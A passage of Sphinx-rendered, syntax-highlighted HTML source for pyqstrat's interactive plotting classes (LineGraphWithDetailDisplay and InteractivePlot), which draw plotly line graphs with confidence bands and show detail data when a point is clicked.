class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> display_detail_func: A function that displays the data on the detail pane. Default SimpleDetailTable</span>\n<span class=\"sd\"> line_configs: Configuration of each line. The key in this dict is the zvalue for that line. Default {}</span>\n<span class=\"sd\"> title: Title of the graph. Default None</span>\n<span class=\"sd\"> hovertemplate: What to display when we hover over a point on the graph. See plotly hovertemplate</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_detail_func</span> <span class=\"o\">=</span> <span class=\"n\">display_detail_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span> <span class=\"o\">=</span> <span class=\"n\">line_configs</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">title</span> <span class=\"o\">=</span> <span class=\"n\">title</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">hovertemplate</span> <span class=\"o\">=</span> <span class=\"n\">hovertemplate</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span> <span class=\"o\">=</span> <span class=\"n\">debug</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">default_line_config</span> <span class=\"o\">=</span> <span class=\"n\">LineConfig</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zvalues</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span> <span class=\"c1\"># trace index by zvalue</span></div>\n \n<div class=\"viewcode-block\" id=\"LineGraphWithDetailDisplay.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.LineGraphWithDetailDisplay.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">xaxis_title</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">yaxis_title</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">line_data</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Draw the plot and also set it up so if you click on a point, we display the data used to compute that point.</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> line_data: The zvalue, plot data, and detail data for each line to draw. The plot data must have </span>\n<span class=\"sd\"> x as the first column and y as the second column</span>\n<span class=\"sd\"> Return:</span>\n<span class=\"sd\"> A list of widgets to draw. In this case, a figure widget and a output widget which contains the detail display</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">line_data</span><span class=\"p\">):</span> <span class=\"k\">return</span> <span class=\"p\">[]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"o\">.</span><span class=\"n\">clear</span><span class=\"p\">()</span>\n <span class=\"n\">secondary_y</span> <span class=\"o\">=</span> <span class=\"nb\">any</span><span class=\"p\">([</span><span class=\"n\">lc</span><span class=\"o\">.</span><span class=\"n\">secondary_y</span> <span class=\"k\">for</span> <span class=\"n\">lc</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">()])</span>\n \n <span class=\"n\">fig_widget</span> <span class=\"o\">=</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">FigureWidget</span><span class=\"p\">(</span><span class=\"n\">make_subplots</span><span class=\"p\">(</span><span class=\"n\">specs</span><span class=\"o\">=</span><span class=\"p\">[[{</span><span class=\"s2\">&quot;secondary_y&quot;</span><span class=\"p\">:</span> <span class=\"n\">secondary_y</span><span class=\"p\">}]]))</span>\n <span class=\"c1\"># fig_widget.on_trait_change(foo, &#39;_js2py_restyle&#39;)</span>\n <span class=\"c1\"># fig_widget.on_trait_change()</span>\n <span class=\"n\">detail_widget</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Output</span><span class=\"p\">()</span>\n \n <span class=\"n\">trace_num</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n\n <span class=\"k\">for</span> <span class=\"n\">line_num</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">zvalue</span><span class=\"p\">,</span> <span class=\"n\">line_df</span><span class=\"p\">,</span> <span class=\"n\">_detail_data</span><span class=\"p\">)</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">line_data</span><span class=\"p\">):</span>\n <span class=\"n\">x</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">columns</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"n\">y</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">1</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"p\">[</span><span class=\"n\">zvalue</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">_detail_data</span>\n <span class=\"n\">line_config</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span><span class=\"p\">[</span><span class=\"n\">zvalue</span><span class=\"p\">]</span> <span class=\"k\">if</span> <span class=\"n\">zvalue</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">default_line_config</span>\n <span class=\"n\">marker_mode</span> <span class=\"o\">=</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">marker_mode</span>\n <span class=\"n\">color</span> <span class=\"o\">=</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">color</span> <span class=\"k\">if</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">color</span> <span class=\"k\">else</span> <span class=\"n\">DEFAULT_PLOTLY_COLORS</span><span class=\"p\">[</span><span class=\"n\">line_num</span><span class=\"p\">]</span>\n \n <span class=\"n\">hovertemplate</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">hovertemplate</span>\n <span class=\"n\">customdata</span> <span class=\"o\">=</span> <span class=\"kc\">None</span>\n \n <span class=\"k\">if</span> <span class=\"n\">hovertemplate</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">unique</span><span class=\"p\">,</span> <span class=\"n\">counts</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">_detail_data</span><span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">return_counts</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"n\">customdata</span> <span class=\"o\">=</span> <span class=\"n\">counts</span><span class=\"p\">[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"n\">unique</span><span class=\"p\">,</span> <span class=\"n\">x</span><span class=\"p\">)]</span>\n <span class=\"n\">hovertemplate</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;N: %</span><span class=\"si\">{customdata}</span><span class=\"s1\">&#39;</span> <span class=\"c1\"># number of entries used to compute each x</span>\n <span class=\"n\">hovertemplate</span> <span class=\"o\">+=</span> <span class=\"sa\">f</span><span class=\"s1\">&#39; Series: </span><span class=\"si\">{</span><span class=\"n\">zvalue</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">xaxis_title</span><span class=\"si\">}</span><span class=\"s1\">: &#39;</span> <span class=\"o\">+</span> <span class=\"s1\">&#39;%</span><span class=\"si\">{x:.4g}</span><span class=\"s1\"> &#39;</span> <span class=\"o\">+</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;</span><span class=\"si\">{</span><span class=\"n\">yaxis_title</span><span class=\"si\">}</span><span class=\"s1\">: &#39;</span> <span class=\"o\">+</span> <span class=\"s1\">&#39;%</span><span class=\"si\">{y:.4g}</span><span class=\"s1\">&#39;</span>\n \n <span class=\"n\">trace</span> <span class=\"o\">=</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">Scatter</span><span class=\"p\">(</span>\n <span class=\"n\">x</span><span class=\"o\">=</span><span class=\"n\">x</span><span class=\"p\">,</span>\n <span class=\"n\">y</span><span class=\"o\">=</span><span class=\"n\">y</span><span class=\"p\">,</span>\n <span class=\"n\">customdata</span><span class=\"o\">=</span><span class=\"n\">customdata</span><span class=\"p\">,</span>\n <span class=\"n\">mode</span><span class=\"o\">=</span><span class=\"n\">marker_mode</span><span class=\"p\">,</span>\n <span class=\"n\">name</span><span class=\"o\">=</span><span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">zvalue</span><span class=\"p\">),</span>\n <span class=\"n\">line</span><span class=\"o\">=</span><span class=\"nb\">dict</span><span class=\"p\">(</span><span class=\"n\">color</span><span class=\"o\">=</span><span class=\"n\">color</span><span class=\"p\">),</span>\n <span class=\"n\">hovertemplate</span><span class=\"o\">=</span><span class=\"n\">hovertemplate</span> \n <span class=\"p\">)</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zvalues</span><span class=\"p\">[</span><span class=\"n\">trace_num</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">zvalue</span>\n \n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">add_trace</span><span class=\"p\">(</span><span class=\"n\">trace</span><span class=\"p\">,</span> <span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">secondary_y</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">show_detail</span><span class=\"p\">:</span>\n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">trace_num</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">on_click</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_on_graph_click</span><span class=\"p\">,</span> <span class=\"n\">append</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"n\">trace_num</span> <span class=\"o\">+=</span> <span class=\"mi\">1</span>\n\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">columns</span><span class=\"p\">)</span> <span class=\"o\">&gt;</span> <span class=\"mi\">2</span><span class=\"p\">:</span> <span class=\"c1\"># x, y, ci up and ci down </span>\n <span class=\"n\">fill_color</span> <span class=\"o\">=</span> <span class=\"n\">_plotly_color_to_rgb</span><span class=\"p\">(</span><span class=\"n\">color</span><span class=\"p\">)</span>\n <span class=\"n\">fill_color</span> <span class=\"o\">=</span> <span class=\"n\">_lighten_color</span><span class=\"p\">(</span><span class=\"o\">*</span><span class=\"n\">fill_color</span><span class=\"p\">)</span>\n <span class=\"c1\"># we set transparency to 0.5 so we can see lines under the ci fill</span>\n <span class=\"n\">fill_color_str</span> <span class=\"o\">=</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;rgba(</span><span class=\"si\">{</span><span class=\"n\">fill_color</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">,</span><span class=\"si\">{</span><span class=\"n\">fill_color</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">,</span><span class=\"si\">{</span><span class=\"n\">fill_color</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">,0.5)&#39;</span>\n <span class=\"n\">ci_down</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">2</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">ci_up</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">3</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">ci_trace</span> <span class=\"o\">=</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">Scatter</span><span class=\"p\">(</span>\n <span class=\"n\">x</span><span class=\"o\">=</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">concatenate</span><span class=\"p\">([</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">x</span><span class=\"p\">[::</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]]),</span> <span class=\"c1\"># x, then x reversed</span>\n <span class=\"n\">y</span><span class=\"o\">=</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">concatenate</span><span class=\"p\">([</span><span class=\"n\">ci_up</span><span class=\"p\">,</span> <span class=\"n\">ci_down</span><span class=\"p\">[::</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]]),</span> <span class=\"c1\"># upper, then lower reversed</span>\n <span class=\"n\">fill</span><span class=\"o\">=</span><span class=\"s1\">&#39;toself&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">fillcolor</span><span class=\"o\">=</span><span class=\"n\">fill_color_str</span><span class=\"p\">,</span>\n <span class=\"n\">line</span><span class=\"o\">=</span><span class=\"nb\">dict</span><span class=\"p\">(</span><span class=\"n\">color</span><span class=\"o\">=</span><span class=\"s1\">&#39;rgba(255,255,255,0)&#39;</span><span class=\"p\">),</span>\n <span class=\"n\">hoverinfo</span><span class=\"o\">=</span><span class=\"s2\">&quot;skip&quot;</span><span class=\"p\">,</span>\n <span class=\"n\">showlegend</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span>\n \n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">add_trace</span><span class=\"p\">(</span><span class=\"n\">ci_trace</span><span class=\"p\">,</span> <span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">secondary_y</span><span class=\"p\">)</span>\n <span class=\"n\">trace_num</span> <span class=\"o\">+=</span> <span class=\"mi\">1</span>\n \n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">update_layout</span><span class=\"p\">(</span><span class=\"n\">title</span><span class=\"o\">=</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">title</span><span class=\"p\">,</span> <span class=\"n\">xaxis_title</span><span class=\"o\">=</span><span class=\"n\">xaxis_title</span><span class=\"p\">)</span>\n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">update_layout</span><span class=\"p\">(</span><span class=\"n\">yaxis_title</span><span class=\"o\">=</span><span class=\"n\">yaxis_title</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"n\">secondary_y</span><span class=\"p\">:</span>\n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">update_yaxes</span><span class=\"p\">(</span><span class=\"n\">title_text</span><span class=\"o\">=</span><span class=\"n\">yaxis_title</span><span class=\"p\">,</span> <span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">fig_widget</span> <span class=\"o\">=</span> <span class=\"n\">fig_widget</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_widget</span> <span class=\"o\">=</span> <span class=\"n\">detail_widget</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_data</span> <span class=\"o\">=</span> <span class=\"n\">line_data</span>\n \n <span class=\"k\">return</span> <span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">fig_widget</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_widget</span><span class=\"p\">]</span></div>\n \n <span class=\"k\">def</span> <span class=\"nf\">_on_graph_click</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">trace</span><span class=\"p\">:</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">Trace</span><span class=\"p\">,</span> \n <span class=\"n\">points</span><span class=\"p\">:</span> <span class=\"n\">plotly</span><span class=\"o\">.</span><span class=\"n\">callbacks</span><span class=\"o\">.</span><span class=\"n\">Points</span><span class=\"p\">,</span> \n <span class=\"n\">selector</span><span class=\"p\">:</span> <span class=\"n\">plotly</span><span class=\"o\">.</span><span class=\"n\">callbacks</span><span class=\"o\">.</span><span class=\"n\">InputDeviceState</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Callback called by plotly when you click on a point on the graph.</span>\n<span class=\"sd\"> When you click on a point, we display the dataframe with the data we used to compute that point.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">points</span><span class=\"o\">.</span><span class=\"n\">xs</span><span class=\"p\">):</span> <span class=\"k\">return</span>\n <span class=\"n\">trace_idx</span> <span class=\"o\">=</span> <span class=\"n\">points</span><span class=\"o\">.</span><span class=\"n\">trace_index</span>\n <span class=\"n\">zvalue</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zvalues</span><span class=\"p\">[</span><span class=\"n\">trace_idx</span><span class=\"p\">]</span>\n <span class=\"n\">_detail_data</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"p\">[</span><span class=\"n\">zvalue</span><span class=\"p\">]</span>\n <span class=\"n\">_detail_data</span> <span class=\"o\">=</span> <span class=\"n\">_detail_data</span><span class=\"p\">[</span><span class=\"n\">_detail_data</span><span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span> <span class=\"o\">==</span> <span class=\"n\">points</span><span class=\"o\">.</span><span class=\"n\">xs</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_detail_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_widget</span><span class=\"p\">,</span> <span class=\"n\">_detail_data</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span><span class=\"p\">)</span></div>\n\n\n<div class=\"viewcode-block\" id=\"InteractivePlot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">InteractivePlot</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Creates a multidimensional interactive plot off a dataframe.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"InteractivePlot.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span>\n <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"n\">labels</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span>\n <span class=\"n\">transform_func</span><span class=\"p\">:</span> <span class=\"n\">DataFrameTransformFuncType</span> <span class=\"o\">=</span> <span class=\"n\">SimpleTransform</span><span class=\"p\">(),</span>\n <span class=\"n\">create_selection_widgets_func</span><span class=\"p\">:</span> <span class=\"n\">CreateSelectionWidgetsFunctype</span> <span class=\"o\">=</span> <span class=\"n\">create_selection_dropdowns</span><span class=\"p\">,</span>\n <span class=\"n\">dim_filter_func</span><span class=\"p\">:</span> <span class=\"n\">DimensionFilterType</span> <span class=\"o\">=</span> <span class=\"n\">simple_dimension_filter</span><span class=\"p\">,</span>\n <span class=\"n\">data_filter_func</span><span class=\"p\">:</span> <span class=\"n\">DataFilterType</span> <span class=\"o\">=</span> <span class=\"n\">simple_data_filter</span><span class=\"p\">,</span>\n <span class=\"n\">stat_func</span><span class=\"p\">:</span> <span class=\"n\">StatFuncType</span> <span class=\"o\">=</span> <span class=\"n\">MeanWithCI</span><span class=\"p\">(),</span>\n <span class=\"n\">plot_func</span><span class=\"p\">:</span> <span class=\"n\">PlotFuncType</span> <span class=\"o\">=</span> <span class=\"n\">LineGraphWithDetailDisplay</span><span class=\"p\">(),</span>\n <span class=\"n\">display_form_func</span><span class=\"p\">:</span> <span class=\"n\">DisplayFormFuncType</span> <span class=\"o\">=</span> <span class=\"n\">display_form</span><span class=\"p\">,</span>\n <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> data: The pandas dataframe to use for plotting</span>\n<span class=\"sd\"> labels: A dict where column names from the dataframe are mapped to user friendly labels. For any column names</span>\n<span class=\"sd\"> not found as keys in this dict, we use the column name as the label. Default None</span>\n<span class=\"sd\"> dim_filter_func: A function that generates the values of a dimension based on other dimensions. For example, if </span>\n<span class=\"sd\"> the user chooses &quot;Put Option&quot; in a put/call dropdown, the valid strikes could change in a Strike </span>\n<span class=\"sd\"> dropdown that follows. Default simple_dimension_filter</span>\n<span class=\"sd\"> data_filter_func: A function that filters the data to plot. For example, if the user chooses &quot;Put Option&quot; in a put/call dropdown,</span>\n<span class=\"sd\"> we could filter the dataframe to only include put options. Default simple_data_filter</span>\n<span class=\"sd\"> stat_func: Once we have filtered the data, we may need to plot some statistics, such as mean and confidence intervals.</span>\n<span class=\"sd\"> In this function, we compute these statistics. Default MeanWithCI()</span>\n<span class=\"sd\"> plot_func: A function that plots the data. This could also display detail data used to compute the statistics associated</span>\n<span class=\"sd\"> with each data point.</span>\n<span class=\"sd\"> display_form_func: A function that displays the form given a list of plotly widgets (including the graph widget)</span>\n<span class=\"sd\"> debug: Dont clear forms if this is true so we can see print output</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">data</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transform_func</span> <span class=\"o\">=</span> <span class=\"n\">transform_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">create_selection_widgets_func</span> <span class=\"o\">=</span> <span class=\"n\">create_selection_widgets_func</span>\n <span class=\"k\">if</span> <span class=\"n\">labels</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">labels</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span> <span class=\"o\">=</span> <span class=\"n\">labels</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">dim_filter_func</span> <span class=\"o\">=</span> <span class=\"n\">dim_filter_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data_filter_func</span> <span class=\"o\">=</span> <span class=\"n\">data_filter_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">stat_func</span> <span class=\"o\">=</span> <span class=\"n\">stat_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">plot_func</span> <span class=\"o\">=</span> <span class=\"n\">plot_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_form_func</span> <span class=\"o\">=</span> <span class=\"n\">display_form_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span> <span class=\"o\">=</span> <span class=\"n\">debug</span></div>\n \n<div class=\"viewcode-block\" id=\"InteractivePlot.create_pivot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot.create_pivot\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">create_pivot</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">xcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">dimensions</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Create the initial pivot</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> xcol: Column name to use as the x axis in the DataFrame</span>\n<span class=\"sd\"> ycol: Column name to use as the y axis in the DataFrame</span>\n<span class=\"sd\"> zcol: Column name to use for z-values. Each zvalue can be used for a different trace within this plot. For example, a column</span>\n<span class=\"sd\"> called &quot;option_type&quot; could contain the values &quot;American&quot;, &quot;European&quot;, &quot;Bermudan&quot; and we could plot the data for each type</span>\n<span class=\"sd\"> in a separate trace</span>\n<span class=\"sd\"> dimensions: The column names used for filter dimensions. For example, we may want to filter by days to expiration and put/call</span>\n<span class=\"sd\"> The key the column name and the value is the initial value for that column. For example, in a </span>\n<span class=\"sd\"> dropdown for Put/Call we may want &quot;Put&quot; to be the initial value set in the dropdown. Set to None if you </span>\n<span class=\"sd\"> don&#39;t care what initial value is chosen.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xlabel</span> <span class=\"o\">=</span> <span class=\"n\">xcol</span> <span class=\"k\">if</span> <span class=\"n\">xcol</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span><span class=\"p\">[</span><span 